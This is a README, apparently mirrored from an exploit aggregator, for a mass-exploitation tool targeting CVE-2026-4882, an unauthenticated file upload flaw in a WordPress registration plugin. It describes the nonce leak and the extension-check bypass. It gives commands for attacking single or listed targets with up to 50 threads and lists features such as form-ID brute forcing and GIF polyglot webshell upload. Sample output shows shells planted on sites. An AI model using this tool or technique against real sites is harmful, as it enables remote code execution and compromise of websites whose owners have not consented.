Share
## https://sploitus.com/exploit?id=DD481546-AB6A-54AA-B91D-10A0FE3ADFA2
# CVE-2026-4882
User Registration Advanced Fields <= 1.6.20 - Unauthenticated Arbitrary File Upload

### Description :

User Registration Advanced Fields <= 1.6.20 - Unauthenticated Arbitrary File Upload
Description
The User Registration Advanced Fields plugin for WordPress (versions up to and including 1.6.20) is vulnerable to unauthenticated arbitrary file upload via the `uraf_profile_picture_upload_method_upload` AJAX action. The plugin leaks a valid nonce through `wp_localize_script()` on any page containing a registration form, and using the `is_snapshot=1` parameter bypasses file extension validation entirely. This allows unauthenticated attackers to upload arbitrary files (e.g., PHP webshells disguised as GIF images), which are stored in `wp-content/uploads/user_registration_uploads/temp-uploads/`, leading to full remote code execution (RCE).


# INFO : [**CVE-2026-4882**](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration-advanced-fields/user-registration-advanced-fields-1620-unauthenticated-arbitrary-file-upload)

~ **CVSS Score: 9.8 (Critical)**

~ **Affected Versions: <= 1.6.20**

- Researcher : [**0xd4rk5id3 - EnvoraSec**](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3)

### usage :

**Single target :**
- `python3 shadow.py -u https://target.com -s shadow.php`

**Mass targets :**
- `python3 shadow.py -f targets.txt -s shadow.php -t 30`

**Interactive mode :**
- `python3 shadow.py`
- input target file name
- input thread 1-50 max

### features :

- Multi-threading
- Error Handling
- Auto Nonce + Form ID Discovery
- Homepage & Sitemap Crawling (custom registration paths)
- Brute Force Form ID Fallback
- Auto HTTP/HTTPS Redirect Resolve
- GIF89a Polyglot Shell Upload
- Verification Shell
- Auto-Save Results to shell.txt

### output :

```bash

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘   CVE-2026-4882 โ€” Full Auto Exploit              โ•‘
โ•‘   User Registration Advanced Fields <= 1.6.20    โ•‘
โ•‘   by: Shadow x Friska ๐Ÿ˜ˆ๐Ÿ”ฅ                      โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

  โ•โ•โ• Interactive Mode โ•โ•โ•

  ๐Ÿ“„ Target file (e.g. targets.txt): list.txt
  โšก Threads 1-50 (default 30): 30

  ๐ŸŽฏ Targets : 75
  ๐Ÿ“ Shell   : shadow.php
  โšก Threads : 30
  ๐Ÿ’ฃ Brute   : 1-500

  ๐Ÿฉท [3/75] http://target.com
     โ†’ http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
  ๐Ÿ’€ [1/75] http://example.com โ€” no nonce
  โŒ [4/75] http://example2.com โ€” upload failed

```

## Disclaimer :

## This tool is for educational and security testing purposes only.
Unauthorized use of systems you don't own or don't have permission to test is illegal.